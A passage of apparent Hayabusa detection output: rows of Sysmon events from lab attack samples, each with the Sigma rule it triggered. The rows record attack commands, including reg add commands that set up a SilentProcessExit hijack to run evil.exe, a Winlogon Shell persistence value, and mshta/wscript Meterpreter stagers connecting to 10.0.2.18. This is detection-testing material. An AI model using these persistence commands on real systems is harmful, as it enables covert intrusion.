SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx 2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: 
C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: 
SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 
365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | 
LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" 
/stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
